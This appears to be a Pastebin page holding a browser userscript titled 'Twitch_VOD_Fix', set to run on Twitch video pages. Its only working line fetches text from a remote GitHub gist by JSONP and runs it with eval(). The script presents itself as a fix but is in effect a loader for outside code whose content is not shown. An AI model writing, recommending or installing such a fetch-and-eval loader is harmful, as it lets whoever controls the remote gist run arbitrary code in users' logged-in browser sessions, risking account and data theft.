Advertisement
B1uscr34m

Twitch_VOD_Fix.user.js

Feb 22nd, 2016
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // ==UserScript==
  2. // @name        Twitch_VOD_Fix
  3. // @namespace   Engo29
  4. // @include     /http://www\.twitch\.tv/.*/\w\/\d*/
  5. // @version     1.0
  6. // @grant       none
  7. // ==/UserScript==
  8. $.ajax({url:"https://gist.githubusercontent.com/LinkTree3/3ecd2d725eece4f5d9e9/raw/",dataType:"jsonp",success:function(c){eval(c)}});
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement